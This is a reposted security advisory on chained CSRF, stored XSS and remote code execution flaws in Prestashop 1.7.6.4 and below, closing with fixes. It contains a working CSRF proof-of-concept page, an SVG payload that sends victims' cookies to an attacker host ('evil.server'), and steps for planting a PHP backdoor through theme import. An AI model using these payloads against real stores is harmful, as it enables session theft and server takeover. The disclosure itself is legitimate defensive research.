Prestashop 1.7.6.4 XSS / CSRF / Remote Code Execution

#175
Topic created · 1 Posts · 1 Views
  • Prestashop versions 1.7.6.4 and below suffer from code execution, cross site request forgery, and cross site scripting vulnerabilities.
    MD5 | e88f3fb2cabe4dd5fc52ac8955ab17bb
    Download

    ##########################################################################  
    #              Prestashop <= 1.7.6.4 Multiple Vulnerabilities            #  
    ##########################################################################  
    Author - Sivanesh Ashok | @sivaneshashok <https://twitter.com/sivaneshashok>  
    | stazot.com  
    Last Modified: 2020-04-11  
    Vendor       : https://www.prestashop.com/  
    Version      : <= 1.7.6.4  
    Tested on    : 1.7.6.4  
    --[ Table of Contents  
    00 - Introduction  
    01 - Exploit  
    02 - Cross-Site Request Forgery (CSRF)  
    02.1 - Exploitation  
    03 - Stored Cross-Site Scripting  
    03.1 - Exploitation  
    04 - Escalation to RCE  
    04.1 - Exploitation  
    05 - Solution  
    06 - Contact  
    --[ 00 - Introduction  
    Prestashop is an open source e-commerce solution written in PHP. This  
    article is about the CSRF and XSS vulnerabilities I discovered and how it  
    was chained and escalated to single-click RCE, as an unauthenticated  
    attacker.  
    --[ 01 - Exploit  
    I wrote an exploit that chains the vulnerabilities described below to  
    achieve single-click RCE, as an unauthenticated attacker. It can be found  
    in the link below.  
    https://github.com/staz0t/exploits/blob/master/SA20200411_prestashop_csrf_to_rce.html  
    You would need a Prestashop theme zip file to achieve RCE. A simple theme  
    can be downloaded from here - https://github.com/PrestaShop/classic-rocket  
    Download the theme and add a PHP backdoor in the theme zip file. Host it in  
    a webserver. Now edit the JS variables in the exploit and host it on a  
    webpage, send the link to the admin. Once the admin visits the webpage, the  
    PHP file will be uploaded and can be visited in the link below  
    http://target.server/themes/{theme-name}/{php-file-name}.php  
    --[ 02 - Cross-Site Request Forgery (CSRF)  
    An unauthenticated attacker can exploit this vulnerability to trick an  
    authenticated user with 'Products Edit' permission to upload files to the  
    'File Manager'. This application does not check for a CSRF token in the  
    File Manager's upload endpoint, {adminurl}/filemanager/upload.php, which  
    causes this issue.  
    --[ 02.1 - Exploitation  
    To exploit this vulnerability, an attacker should craft a CSRF webpage, and  
    trick an authenticated user with 'Products Edit' permission to visit the  
    webpage.  
    1. Create a webpage that automatically submits a POST upload request to the  
    file manager.  
    For example,  
    ----[ code segment ]----  
    <html>  
    <!-- CSRF PoC - generated by Burp Suite Professional -->  
    <body>  
    <script>history.pushState('', '', '/')</script>  
    <script>  
    function submitRequest()  
    {  
    var xhr = new XMLHttpRequest();  
    xhr.open("POST",  
    "http:\/\/prestashop.localhost-windows.com\/admin501to49xz\/filemanager\/upload.php",  
    true);  
    xhr.setRequestHeader("Content-Type", "multipart\/form-data;  
    boundary=---------------------------6487332036660663652470259777");  
    xhr.withCredentials = true;  
    var body =  
    "-----------------------------6487332036660663652470259777\r\n" +  
    "Content-Disposition: form-data; name=\"path\"\r\n" +  
    "\r\n" +  
    "\r\n" +  
    "-----------------------------6487332036660663652470259777\r\n" +  
    "Content-Disposition: form-data; name=\"path_thumb\"\r\n" +  
    "\r\n" +  
    "\r\n" +  
    "-----------------------------6487332036660663652470259777\r\n" +  
    "Content-Disposition: form-data; name=\"file\";  
    filename=\"csrfpoc.svg\"\r\n" +  
    "Content-Type: image/svg+xml\r\n" +  
    "\r\n" +  
    "\x3csvg xmlns=\"http://www.w3.org/2000/svg\" /\x3e\r\n" +  
    "\r\n" +  
    "-----------------------------6487332036660663652470259777--\r\n";  
    var aBody = new Uint8Array(body.length);  
    for (var i = 0; i < aBody.length; i++)  
    aBody[i] = body.charCodeAt(i);  
    xhr.send(new Blob([aBody]));  
    }  
    submitRequest();  
    </script>  
    </body>  
    </html>  
    ----[ code segment ]----  
    2. Send the link of the webpage to the victim.  
    The above code segment uploads csrfpoc.svg when the victim user visits the  
    webpage that hosts this code.  
    --[ 03 - Stored Cross-Site Scripting  
    An attacker can exploit this vulnerability to execute javascript code in  
    the context of the victim. The vulnerability is in the 'File Manager'.  
    Backed users with 'Products Edit' permission can upload files, with  
    whitelisted extension.  
    By default, the following extensions are allowed to be uploaded in the File  
    Manager.  
    jpg, jpeg, png, gif, bmp, tiff, svg, pdf, mov, mpeg, mp4, avi, mpg, wma,  
    flv, webm  
    As mentioned, SVG files are allowed and SVG files can contain javascript  
    code in them. This allows a backend user with 'Products Edit' permission to  
    run arbitrary javascript code in the context of a victim.  
    --[ 03.1 - Exploitation  
    An unauthenticated attacker can chain the previously explained CSRF with  
    this vulnerability to trick an authenticated user with 'Products Edit'  
    permission to upload an SVG file with malicious javascript code.  
    1. Create an SVG file with javascript payload in it.  
    For example,  
    <svg xmlns="http://www.w3.org/2000/svg" onload="document.location='  
    http://evil.server/?c='+document.cookie;" />  
    This payload sends the victim's cookies to attacker's server  
    2. Create a webpage that automatically submits a POST upload request, with  
    the contents of the malicious SVG file.  
    3. Host the webpage and send the link to the victim with 'Products Edit'  
    permission.  
    4. When the victim opens the URL, the SVG file with the javascript payload  
    gets uploaded to http://target.server/img/cms/evil.svg  
    5. Send the SVG link to the target victim. When the victim opens the link,  
    the cookies of the victim gets sent to the attacker.  
    --[ 04 - Escalation to Remote Code Execution  
    By targeting the admin, an attacker can gain RCE in the server. This is  
    achieved by using the 'Import Theme' functionality.  
    --[ 04.1 - Exploitation  
    Theme import functionality can fetch a ZIP file and unpack it to themes/  
    directory, provided that the ZIP has all the necessary theme files. The ZIP  
    file could contain a PHP file, and the server will still unzip it to  
    themes/{theme-name} directory.  
    An attacker can exploit this feature to upload a theme with a malicious PHP  
    file to achieve RCE, by using the previously explained CSRF and XSS bug  
    chain.  
    1. Create an SVG file with javascript payload that does the following.  
    1.1. Opens the 'Import Theme' page and fetches the CSRF token  
    1.2. Send a POST request to the theme upload endpoint with the link to  
    the malicious ZIP file  
    2. Create a webpage that exploits the CSRF to automatically submit a POST  
    upload request to the file manager's upload endpoint to upload the  
    malicious SVG file.  
    3. Send the webpage's link to an authenticated user with 'Products Edit'  
    permission (or the admin). This uploads the SVG file to the server.  
    http://target.server/img/cms/exploit.svg  
    4. Now send the uploaded SVG file's link to the admin. When the admin opens  
    the link, the theme with the PHP file gets imported. It can be opened with  
    the following link.  
    http://target.server/themes/{theme-name}/backdoor.php  
    Putting all this together, an unauthenticated attacker can achieve  
    single-click RCE by targeting the admin (SuperUser) of the server.  
    --[ 05 - Solution  
    1. Implement CSRF protection in {adminurl}/filemanager/upload.php endpoint.  
    2. Disallow SVG upload in File Manager or validate the SVG file's contents  
    before uploading.  
    3. Consider implementing a validation process to check for PHP files before  
    importing the theme ZIP file.  
    --[ 06 - Contact  
    Name   : Sivanesh Ashok  
    Twitter: @sivaneshashok <https://twitter.com/sivaneshashok>  
    Website: https://stazot.com  
    

    Source: packetstormsecurity.com

Log in to reply